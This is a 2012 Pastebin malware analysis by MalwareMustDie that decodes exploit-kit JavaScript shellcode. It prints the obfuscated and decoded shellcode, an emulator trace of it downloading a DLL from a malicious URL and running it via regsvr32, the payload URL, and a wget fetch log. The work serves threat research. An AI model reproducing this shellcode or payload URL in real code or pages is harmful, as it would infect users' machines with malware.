SHARE
TWEET

#MalwareMustDie FLUSH4 - PluginDetect 0.7.9. Nov 25, 2012

MalwareMustDie Nov 25th, 2012 176 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. =======================================
  2. #MalwareMustDie - @unixfreaxjp ~]$ date
  3. Sun Nov 25 20:58:35 JST 2012
  4.  
  5. GET THE EXE PAYLOAD via SHELLCODE
  6. =======================================
  7. // it has been detected the shellcode too,
  8. // here's the function armed & loaded
  9.  function getShellCode()
  10.  {
  11.    var a="8200!%5482!%4451!%e015!%51d5!%c4c5!%34e0!%5191!%e0e5!%9174!%2421!%2191!%b191!%3421!%2191!%9134!%b121!%21b1!%b1a1!%5421!%2191!%9134!%e521!%51a1!%74d4!%b1e0!%21b1!%9114!%1421!%2191!%9164!%8121!%51b1!%85e4!%8571!%8504!%6460!%d554!%7444!%70b4!%34b5!%1464!%7044!%d554!%74a5!%70e4!%0181!%0181!%d521!%60a5!%74a5!%94c5!%5414!%44d4!%c4d4!%7070!%8521!%c5c5!%8504!%2370!%15e1!%eee6!%3733!%2e2a!%59b1!%7492!%621a!%6d2a!%4c0b!%6662!%7d6a!%6d7d!%0c4b!%e702!%6d7d!%8224!%ce24!%82d5!%8a71!%2df6!%82d5!%8a71!%b3f6!%a23c!%423c!%babe!%e7c2!%b77d!%3c42!%82ba!%c224!%7de7!%82b7!%e324!%8ed5!%c3da!%7de7!%2482!%b7f7!%2482!%2482!%9697!%53c2!%0ac6!%c281!%2a9e!%8217!%5312!%eec6!%4444!%60c4!%53d2!%fec6!%a4c5!%f585!%5382!%fec6!%1e97!%0cb1!%423a!%7de7!%8282!%0d82!%b704!%b580!%8050!%c002!%fec6!%b1a1!%e5a5!%c0c2!%fec6!%f4b5!%a5d4!%c2c0!%42fe!%47c0!%825a!%9282!%4cc2!%a59a!%a23c!%7d3c!%7d7d!%0c94!%3a0c!%ce02!%e3ba!%c77d!%4454!%d5a5!%8204!%6482!%0474!%7dbc!%bed2!%83ba!%3a67!%3a4c!%87d7!%8e13!%87ba!%8282!%7d82!%8604!%8724!%8207!%8282!%0c82!%ac1d!%7d7d!%0b7d!%170c!%24d2!%3afd!%0402!%bd3a!%eb3c!%c5b2!%42b1!%8a55!%0480!%583a!%3cb7!%17be!%3867!%b2de!%c23a!%5f3a!%0fb2!%423a!%c7c0!%4c7d!%5ae6!%4236!%e43a!%b25f!%67c0!%673a!%d5ec!%3173!%3c9d!%2f86!%52b2!%9e3e!%c502!%01ad!%6983!%3f72!%deb1!%58b2!%964d!%1e16!%ddb1!%80b2!%3ae5!%dde7!%05b2!%c5d1!%413a!%3ad5!%97e7!%3c46!%971c!%ccd5!%c0da!%fac1!%d53d!%11e2!%bee6!%8681!%093a!%7d7d!%d383!%9a6c!%b140!%b2c5!%6741!%e43a!%b13f!%e502!%e73a!%8543!%423a!%3a86!%8681!%c43a!%b18e!%1c77!%d5c1!%dacc!%ffff!%beff!%508e!%afbe!%042e!%0382!%ef08!%9eb0!%6618!%139c!%0185!%cfbe!%4ecf!%6638!%1414!%
  12.   1414!%".split("").reverse().join("");
  13. //   return str_replace((window.document)?"%!":"", "%u", a) // I commented this on purpose...
  14.  }
  15.  
  16. //burped the var a and we get↓
  17.  
  18. %!4141%!4141%!8366%!fce4%!ebfc%!5810%!c931%!8166%!0be9%!80fe%!2830%!e240%!ebfa%!e805%!ffeb%!ffff%!ccad%!1c5d%!77c1%!e81b%!a34c%!1868%!68a3%!a324%!3458%!a37e%!205e%!f31b%!a34e%!1476%!5c2b%!041b%!c6a9%!383d%!d7d7%!a390%!1868%!6eeb%!2e11%!d35d%!1caf%!ad0c%!5dcc%!c179%!64c3%!7e79%!5da3%!a314%!1d5c%!2b50%!7edd%!5ea3%!2b08%!1bdd%!61e1%!d469%!2b85%!1bed%!27f3%!3896%!da10%!205c%!e3e9%!2b25%!68f2%!d9c3%!3713%!ce5d%!a376%!0c76%!f52b%!a34e%!6324%!6ea5%!d7c4%!0c7c%!a324%!2bf0%!a3f5%!a32c%!ed2b%!7683%!eb71%!7bc3%!a385%!0840%!55a8%!1b24%!2b5c%!c3be%!a3db%!2040%!dfa3%!2d42%!c071%!d7b0%!d7d7%!d1ca%!28c0%!2828%!7028%!4278%!4068%!28d7%!2828%!ab78%!31e8%!7d78%!c4a3%!76a3%!ab38%!2deb%!cbd7%!4740%!2846%!4028%!5a5d%!4544%!d77c%!ab3e%!20ec%!c0a3%!49c0%!d7d7%!c3d7%!c32a%!a95a%!2cc4%!2829%!a528%!0c74%!ef24%!0c2c%!4d5a%!5b4f%!6cef%!2c0c%!5a5e%!1a1b%!6cef%!200c%!0508%!085b%!407b%!28d0%!2828%!7ed7%!a324%!1bc0%!79e1%!6cef%!2835%!585f%!5c4a%!6cef%!2d35%!4c06%!4444%!6cee%!2135%!7128%!e9a2%!182c%!6ca0%!2c35%!7969%!2842%!2842%!7f7b%!2842%!7ed7%!ad3c%!5de8%!423e%!7b28%!7ed7%!422c%!ab28%!24c3%!d77b%!2c7e%!ebab%!c324%!c32a%!6f3b%!17a8%!5d28%!6fd2%!17a8%!5d28%!42ec%!4228%!d7d6%!207e%!b4c0%!d7d6%!a6d7%!2666%!b0c4%!a2d6%!a126%!2947%!1b95%!a2e2%!3373%!6eee%!1e51%!0732%!4058%!5c5c%!1258%!0707%!4d4c%!4d44%!4145%!5c49%!5a47%!5a06%!125d%!1810%!1810%!4e07%!5a47%!455d%!4407%!4641%!5b43%!4b07%!4447%!455d%!0646%!4058%!1758%!4e58%!1b15%!1218%!4619%!1912%!1241%!4119%!1b12%!0e1b%!4d47%!1a15%!125e%!4319%!1912%!1245%!1a1b%!1b12%!121b%!4319%!1912%!1243%!191b%!1912%!1242%!4719%!5e0e%!1915%!0e43%!5c4c%!5d15%!510e%!1544%!2845%!0028
  19.  
  20. // follow the commented [ return str_replace((window.document)?"%!":"", "%u", a) ] to get the var below...
  21.  
  22. %u4141%u4141%u8366%ufce4%uebfc%u5810%uc931%u8166%u0be9%u80fe%u2830%ue240%uebfa%ue805%uffeb%uffff%uccad%u1c5d%u77c1%ue81b%ua34c%u1868%u68a3%ua324%u3458%ua37e%u205e%uf31b%ua34e%u1476%u5c2b%u041b%uc6a9%u383d%ud7d7%ua390%u1868%u6eeb%u2e11%ud35d%u1caf%uad0c%u5dcc%uc179%u64c3%u7e79%u5da3%ua314%u1d5c%u2b50%u7edd%u5ea3%u2b08%u1bdd%u61e1%ud469%u2b85%u1bed%u27f3%u3896%uda10%u205c%ue3e9%u2b25%u68f2%ud9c3%u3713%uce5d%ua376%u0c76%uf52b%ua34e%u6324%u6ea5%ud7c4%u0c7c%ua324%u2bf0%ua3f5%ua32c%ued2b%u7683%ueb71%u7bc3%ua385%u0840%u55a8%u1b24%u2b5c%uc3be%ua3db%u2040%udfa3%u2d42%uc071%ud7b0%ud7d7%ud1ca%u28c0%u2828%u7028%u4278%u4068%u28d7%u2828%uab78%u31e8%u7d78%uc4a3%u76a3%uab38%u2deb%ucbd7%u4740%u2846%u4028%u5a5d%u4544%ud77c%uab3e%u20ec%uc0a3%u49c0%ud7d7%uc3d7%uc32a%ua95a%u2cc4%u2829%ua528%u0c74%uef24%u0c2c%u4d5a%u5b4f%u6cef%u2c0c%u5a5e%u1a1b%u6cef%u200c%u0508%u085b%u407b%u28d0%u2828%u7ed7%ua324%u1bc0%u79e1%u6cef%u2835%u585f%u5c4a%u6cef%u2d35%u4c06%u4444%u6cee%u2135%u7128%ue9a2%u182c%u6ca0%u2c35%u7969%u2842%u2842%u7f7b%u2842%u7ed7%uad3c%u5de8%u423e%u7b28%u7ed7%u422c%uab28%u24c3%ud77b%u2c7e%uebab%uc324%uc32a%u6f3b%u17a8%u5d28%u6fd2%u17a8%u5d28%u42ec%u4228%ud7d6%u207e%ub4c0%ud7d6%ua6d7%u2666%ub0c4%ua2d6%ua126%u2947%u1b95%ua2e2%u3373%u6eee%u1e51%u0732%u4058%u5c5c%u1258%u0707%u4d4c%u4d44%u4145%u5c49%u5a47%u5a06%u125d%u1810%u1810%u4e07%u5a47%u455d%u4407%u4641%u5b43%u4b07%u4447%u455d%u0646%u4058%u1758%u4e58%u1b15%u1218%u4619%u1912%u1241%u4119%u1b12%u0e1b%u4d47%u1a15%u125e%u4319%u1912%u1245%u1a1b%u1b12%u121b%u4319%u1912%u1243%u191b%u1912%u1242%u4719%u5e0e%u1915%u0e43%u5c4c%u5d15%u510e%u1544%u2845%u0028
  23.  
  24. //or you can actually strip the "%!" the we get the binary of shellcode...
  25.  
  26. 414141418366fce4ebfc5810c93181660be980fe2830e240ebfae805ffebffffccad1c5d77c1e81ba34c186868a3a3243458a37e205ef31ba34e14765c2b041bc6a9383dd7d7a39018686eeb2e11d35d1cafad0c5dccc17964c37e795da3a3141d5c2b507edd5ea32b081bdd61e1d4692b851bed27f33896da10205ce3e92b2568f2d9c33713ce5da3760c76f52ba34e63246ea5d7c40c7ca3242bf0a3f5a32ced2b7683eb717bc3a385084055a81b242b5cc3bea3db2040dfa32d42c071d7b0d7d7d1ca28c0282870284278406828d72828ab7831e87d78c4a376a3ab382debcbd74740284640285a5d4544d77cab3e20ecc0a349c0d7d7c3d7c32aa95a2cc42829a5280c74ef240c2c4d5a5b4f6cef2c0c5a5e1a1b6cef200c0508085b407b28d028287ed7a3241bc079e16cef2835585f5c4a6cef2d354c0644446cee21357128e9a2182c6ca02c357969284228427f7b28427ed7ad3c5de8423e7b287ed7422cab2824c3d77b2c7eebabc324c32a6f3b17a85d286fd217a85d2842ec4228d7d6207eb4c0d7d6a6d72666b0c4a2d6a12629471b95a2e233736eee1e51073240585c5c125807074d4c4d4441455c495a475a06125d181018104e075a47455d440746415b434b074447455d0646405817584e581b15121846191912124141191b120e1b4d471a15125e4319191212451a1b1b12121b431919121243191b1912124247195e0e19150e435c4c5d15510e154428450028
  27.  
  28. //if we decode it well, you'll see the below result, which having url downloader...
  29.  
  30. 0x7c801ad9 kernel32.VirtualProtect(lpAddress=0x4020cf, dwSize=255)
  31. 0x7c801d7b kernel32.LoadLibraryA(lpFileName=urlmon)
  32. 0x7c835dfa kernel32.GetTempPathA(lpBuffer=0x22fc60, nBufferLength=248, [lpBuffer=C:\DOCUME~1\Administrator\LOCALS~1\Temp\])    
  33. 0x1a494bbe urlmon.URLDownloadToFileA(pCaller=0, szURL=http://delemiator.ru:8080/forum/links/column.php?pf=30:1n:1i:1i:33&oe=2v:1k:1m:32:33:1k:1k:31:1j:1o&v=1k&dt=u&yl=m, lpfnCB=0x0, szFileName=C:\DOCUME~1\Administrator\LOCALS~1\Temp\wpbt0.dll)
  34. 0x7c86250d kernel32.WinExec(lpCmdLine=C:\DOCUME~1\Administrator\LOCALS~1\Temp\wpbt0.dll, uCmdShow=0)   
  35. 0x7c86250d kernel32.WinExec(lpCmdLine=regsvr32 -s C:\DOCUME~1\Administrator\LOCALS~1\Temp\wpbt0.dll, uCmdShow=0)       
  36. 0x7c81cb3b kernel32.TerminateThread(dwExitCode=0)
  37.  
  38. // you see, as usual, it downloads the payload and save it as dll file..., below us the url...
  39.  
  40. http://delemiator.ru:8080/forum/links/column.php?pf=30:1n:1i:1i:33&oe=2v:1k:1m:32:33:1k:1k:31:1j:1o&v=1k&dt=u&yl=m
  41.  
  42. --19:14:57--  http://delemiator.ru:8080/forum/links/column.php?pf=30:1n:1i:1i:33&oe=2v:1k:1m:32:33:1k:1k:31:1j:1o&v=1k&dt=u&yl=m
  43.            => `column.php@pf=30%3A1n%3A1i%3A1i%3A33&oe=2v%3A1k%3A1m%3A32%3A33%3A1k%3A1k%3A31%3A1j%3A1o&v=1k&dt=u&yl=m'
  44. Resolving delemiator.ru... 203.80.16.81, 208.87.243.131, 202.180.221.186
  45. Connecting to delemiator.ru|203.80.16.81|:8080... connected.
  46. HTTP request sent, awaiting response... 200 OK
  47. Length: 92,672 (91K) [application/x-msdownload]
  48. 19:15:00 (106.41 KB/s) - `column.php@pf=30%3A1n%3A1i%3A1i%3A33&oe=2v%3A1k%3A1m%3A32%3A33%3A1k%3A1k%3A31%3A1j%3A1o&v=1k&dt=u&yl=m' saved [92672/92672]
  49.  
  50. ---
  51. #MalwareMustDie
  52. We fired your Exploit Kits...
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!
 
Top